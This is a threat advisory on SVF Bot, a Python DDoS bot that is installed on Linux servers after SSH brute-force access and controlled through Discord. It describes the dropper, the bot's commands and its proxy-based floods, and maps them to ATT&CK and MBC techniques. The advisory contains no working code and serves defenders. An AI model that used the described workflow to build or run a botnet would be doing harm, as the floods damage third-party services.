EXECUTIVE SUMMARY:
This advisory describes an attack where poorly managed Linux servers with SSH open to the internet are targeted to install a Python‑based DDoS bot called SVF Bot. The threat actor uses brute‑force or weak credential access to log into these systems, after which they deploy SVF Bot into a virtual environment. Affected environments include internet‑facing Linux hosts with SSH exposed, especially those without strong passwords or adequate patching. Once compromised, the server becomes part of a botnet capable of executing coordinated Layer 4 and Layer 7 flood attacks. The business impact is significant: infected assets may be co‑opted to launch DDoS attacks against external targets, degrade defensive posture, generate collateral damage against internal services due to resource exhaustion, and potentially involve compliance consequences if infrastructure is abused for malicious activity.
The attack begins with the threat actor gaining SSH access via weak credentials. They then create a Python virtual environment and install dependencies—discord, discord.py, requests, aiohttp, lxml—using pip. The SVF Bot binary is retrieved with a dropper script via wget or curl, and launched with the -s flag defining a botnet group. Upon startup, the bot authenticates to a Discord C&C using a Bot Token and reports the server group identifier via a webhook. SVF Bot supports commands for proxy list retrieval via $load, and can execute L7 HTTP floods and L4 UDP floods using validated public proxies. It dynamically scrapes proxy lists, tests connectivity, and randomly selects proxies to obfuscate origin. Additional commands like $restart, $crash, and $stop allow remote updates and shutdown. The use of Discord as C&C and proxy‑based attack flows are noteworthy TTPs.
The installation of SVF Bot transforms compromised Linux servers into a modular DDoS infrastructure under external control. Its reliance on widely available proxy pools, Discord C&C, and simple command structures make it both flexible and scalable. While the malware itself is relatively straightforward in design, its innovation lies in leveraging public proxies and a mainstream chat platform for control. In the current threat landscape, this underscores persistent weaknesses in SSH‑exposed hosts and the evolving trend of legitimate platforms (Discord) being repurposed for malicious operations.
THREAT PROFILE:
| Tactic | Technique ID | Technique | Sub-Technique |
| Reconnaissance | T1590 | Gather Victim Host Information | – |
| Resource Development | T1587 | Develop Capabilities | – |
| Initial Access | T1110.001 | Brute Force | Password Guessing |
| Execution | T1059.006 | Command and Scripting Interpreter | Python |
| Defense Evasion | T1564.003 | Hide Artifacts | Hidden Files and Directories |
| Command and control | T1102.002 | Web Service | Bidirectional Communication |
| Impact | T1498.002 | Network Denial of Service | Reflection Amplification |
MBC MAPPING:
| Objective | Behaviour ID | Behaviour |
| Execution | E1059 | Command and Scripting Interpreter |
| Persistence | F0012 | Registry Run Keys / Startup Folder |
| Anti-Behavioral Analysis | F0001 | Software Packing |
| Collection | E1056 | Input Capture |
| Discovery | E1082 | System Information Discovery |
| E1083 | File and Directory Discovery | |
| Command and control | B0030 | C2 Communication |
REFERENCES:
The following reports contain further technical details: